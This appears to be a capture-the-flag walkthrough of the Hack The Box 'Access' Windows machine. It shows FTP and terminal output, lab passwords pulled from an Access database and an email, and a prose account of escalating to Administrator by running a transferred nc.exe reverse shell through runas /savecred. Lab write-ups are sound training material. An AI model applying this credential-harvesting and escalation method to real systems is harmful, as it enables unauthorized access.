Hack The Box
HackTheBox “Access” Walkthrough
Access, an easy-level Windows OS machine on HackTheBox, encountered unexpected hurdles like FTP stability issues. Key breakthroughs included discovering anonymous FTP access, obtaining credentials, and progressing to…
Access, an easy-level Windows OS machine on HackTheBox, encountered unexpected hurdles like FTP stability issues. Key breakthroughs included discovering anonymous FTP access, obtaining credentials, and progressing to Telnet. Manual enumeration revealed stored credentials, enabling administrator-level commands.

Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:

Exploring the FTP Service Anonymously.

We discover two directories: “Backups” and “Engineer”.
ftp> ls425 Cannot open data connection.200 PORT command successful.150 Opening ASCII mode data connection.08-23-18 08:16PM <DIR> Backups08-24-18 09:00PM <DIR> Engineer226 Transfer complete.ftp> cd Backups250 CWD command successful.ftp> ls200 PORT command successful.125 Data connection already open; Transfer starting.08-23-18 08:16PM 5652480 backup.mdb226 Transfer complete.ftp> get backup.mdblocal: backup.mdb remote: backup.mdb200 PORT command successful.125 Data connection already open; Transfer starting. 6% |**** | 384 KiB 383.50 KiB/s 00:13 ETAftp: Reading from network: Interrupted system call 0% | | -1 0.00 KiB/s --:-- ETA550 The specified network name is no longer available. WARNING! 318 bare linefeeds received in ASCII mode.File may not have transferred correctly.ftp> bin200 Type set to I.ftp> get backup.mdblocal: backup.mdb remote: backup.mdb200 PORT command successful.125 Data connection already open; Transfer starting.100% |***********************************************************************| 5520 KiB 403.41 KiB/s 00:00 ETA226 Transfer complete.5652480 bytes received in 00:13 (403.39 KiB/s)ftp> cd ..250 CWD command successful.ftp> cd Engineer250 CWD command successful.ftp> ls200 PORT command successful.125 Data connection already open; Transfer starting.08-24-18 12:16AM 10870 Access Control.zip226 Transfer complete.ftp> get "Access Control.zip"local: Access Control.zip remote: Access Control.zip200 PORT command successful.125 Data connection already open; Transfer starting.100% |***********************************************************************| 10870 28.32 KiB/s 00:00 ETA226 Transfer complete.10870 bytes received in 00:00 (28.13 KiB/s)ftp>After enumerating directories, we found two files: Access Control.zip and backup.mdb. Attempting to unzip Access Control.zip revealed a file named Access Control.pst, which we couldn’t access. We then tried using 7z to extract its contents.
┌──(kali㉿kali)-[~/Desktop]└─$ unzip Access\ Control.zip Archive: Access Control.zip skipping: Access Control.pst unsupported compression method 99 ┌──(kali㉿kali)-[~/Desktop]└─$ 7z x Access\ Control.zip 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs 12th Gen Intel(R) Core(TM) i7-1265U (906A4),ASM,AES-NI)Scanning the drive for archives:1 file, 10870 bytes (11 KiB)Extracting archive: Access Control.zip--Path = Access Control.zipType = zipPhysical Size = 10870 Enter password (will not be echoed):We discovered that “Access Control.zip” required a password for access. Consequently, our focus shifted to attempting to open the “backup.mdb” file.

The file “backup.mdb” is a Microsoft Access Database, which we can confirm using the “file” command. So, we’ll employ “mdb-tables” to retrieve the table names.

We’ll explore the table “auth_user” by utilizing “mdb-export” on the backup file “backup.mdb”. Simply run the command:mdb-export backup.mdb auth_user This command will fetch the contents of the specified table, offering valuable insights into its data.

And we get the following credentials:
- admin: admin
- engineer: access4u@security
- backup_admin: admin
And since the zip file is a password-protected, we can use the following two passwords: “admin” and “access4u@security.”

Access Control.zip file is unzipped, revealing a .pst format, commonly associated with Microsoft Exchange mailboxes. Employing readpst, the file undergoes conversion into .mbox format for further examination.
┌──(kali㉿kali)-[~/Desktop]└─$ readpst Access\ Control.pst Opening PST file and indexes...Processing Folder "Deleted Items" "Access Control" - 2 items done, 0 items skipped. ┌──(kali㉿kali)-[~/Desktop]└─$ cat Access\ Control.mbox From "john@megacorp.com" Thu Aug 23 19:44:07 2018Status: ROFrom: john@megacorp.com <john@megacorp.com>Subject: MegaCorp Access Control System "security" accountTo: 'security@accesscontrolsystems.com'Date: Thu, 23 Aug 2018 23:44:07 +0000MIME-Version: 1.0Content-Type: multipart/mixed; boundary="--boundary-LibPST-iamunique-169435549_-_-"----boundary-LibPST-iamunique-169435549_-_-Content-Type: multipart/alternative; boundary="alt---boundary-LibPST-iamunique-169435549_-_-"--alt---boundary-LibPST-iamunique-169435549_-_-Content-Type: text/plain; charset="utf-8"Hi there, The password for the "security" account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. Regards,John--alt---boundary-LibPST-iamunique-169435549_-_-Content-Type: text/html; charset="us-ascii"<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=us-ascii"><meta name=Generator content="Microsoft Word 15 (filtered medium)"><style><!--/* Font Definitions */@font-face {font-family:"Cambria Math"; panose-1:0 0 0 0 0 0 0 0 0 0;}@font-face {font-family:Calibri; panose-1:2 15 5 2 2 2 4 3 2 4;}/* Style Definitions */p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; margin-bottom:.0001pt; font-size:11.0pt; font-family:"Calibri",sans-serif;}a:link, span.MsoHyperlink {mso-style-priority:99; color:#0563C1; text-decoration:underline;}a:visited, span.MsoHyperlinkFollowed {mso-style-priority:99; color:#954F72; text-decoration:underline;}p.msonormal0, li.msonormal0, div.msonormal0 {mso-style-name:msonormal; mso-margin-top-alt:auto; margin-right:0in; mso-margin-bottom-alt:auto; margin-left:0in; font-size:11.0pt; font-family:"Calibri",sans-serif;}span.EmailStyle18 {mso-style-type:personal-compose; font-family:"Calibri",sans-serif; color:windowtext;}.MsoChpDefault {mso-style-type:export-only; font-size:10.0pt; font-family:"Calibri",sans-serif;}@page WordSection1 {size:8.5in 11.0in; margin:1.0in 1.0in 1.0in 1.0in;}div.WordSection1 {page:WordSection1;}--></style><!--[if gte mso 9]><xml><o:shapedefaults v:ext="edit" spidmax="1026" /></xml><![endif]--><!--[if gte mso 9]><xml><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1" /></o:shapelayout></xml><![endif]--></head><body lang=EN-US link="#0563C1" vlink="#954F72"><div class=WordSection1><p class=MsoNormal>Hi there,<o:p></o:p></p><p class=MsoNormal><o:p> </o:p></p><p class=MsoNormal>The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.<o:p></o:p></p><p class=MsoNormal><o:p> </o:p></p><p class=MsoNormal>Regards,<o:p></o:p></p><p class=MsoNormal>John<o:p></o:p></p></div></body></html>--alt---boundary-LibPST-iamunique-169435549_-_-------boundary-LibPST-iamunique-169435549_-_---After analyzing the contents, we uncovered user credentials that promised to propel our progress.Username- security, Password- 4Cc3ssC0ntr0ller With this newfound information, we swiftly proceeded to log in to Telnet.

Let’s enumerate around.
C:\Users\security>cmdkey /listCurrently stored credentials: Target: Domain:interactive=ACCESS\Administrator Type: Domain Password User: ACCESS\AdministratorC:\Users\security>net user administratorUser name AdministratorFull Name Comment Built-in account for administering the computer/domainUser's comment Country code 000 (System Default)Account active YesAccount expires NeverPassword last set 8/21/2018 9:01:12 PMPassword expires NeverPassword changeable 8/21/2018 9:01:12 PMPassword required NoUser may change password NoWorkstations allowed AllLogon script User profile Home directory Last logon 2/24/2024 11:35:27 AMLogon hours allowed AllLocal Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully.Upon executing net users administrator, it unveiled an unusual setting: the "Password Not Required" property was enabled for the Administrator user, granting access without being prompted by a password. Executing cmdkey /list, it became evident that a stored credential for the Administrator user existed on the system.

Upon further enumeration, the discovery of the ZKAccess3.5 Security System.lnk shortcut file on the Public user’s desktop unveils a potential privilege escalation pathway. It suggests that commands can be executed as the Administrator via the runas Windows command when coupled with the /savecred flag.
Combining these insights, executing system commands as the Administrator user is feasible with the inclusion of the /savecred flag within the runas command. Given the absence of a password requirement for the Administrator to log in, the existence of a stored credential for the Administrator user, and the utilization of the runas command with the /savecred flag, a potential privilege escalation scenario emerges.
Exploiting this scenario involves transferring nc.exe to the target system and leveraging it to establish a reverse shell connection with the attacking machine.
Now, copy nc.exe to our working directory and then lunching a python http server.

Download nc.exe to the target box.

Start a listener on our attack box.

We run nc.exe as an administrator with the option /savecred enabled.

By checking back our listener, we can see that we have an admin level shell.

Cheers.